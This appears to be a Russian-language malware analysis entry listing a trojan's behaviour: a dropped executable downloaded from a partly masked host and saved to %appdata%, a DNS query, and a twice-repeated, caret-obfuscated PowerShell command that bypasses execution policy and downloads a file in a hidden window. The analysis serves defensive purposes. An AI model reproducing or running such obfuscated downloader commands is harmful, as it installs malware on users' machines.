Техническая информация
- http://u1###4.onhh.ru/programs/lm/drop.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOW^ERSHE^ll.EXe ^-^E^x^ecUTi^O^nPOlIcY ByP^a^S^s -NOpR^oFIle -^w^iNd^Ow^s^T^yle ^HI^D^deN^ ^(NE^W-Ob^JEct SYs^t^e^M.^n^E^T^.W^eb^cL^ien^T^)^.^Do^WN^LOADf^ile^('http://u1###4....
- DNS ASK u1###4.onhh.ru
- '<SYSTEM32>\cmd.exe' /C "pOW^ERSHE^ll.EXe ^-^E^x^ecUTi^O^nPOlIcY ByP^a^S^s -NOpR^oFIle -^w^iNd^Ow^s^T^yle ^HI^D^deN^ ^(NE^W-Ob^JEct SYs^t^e^M.^n^E^T^.W^eb^cL^ien^T^)^.^Do^WN^LOADf^ile^('http://u1###4....' (со скрытым окном)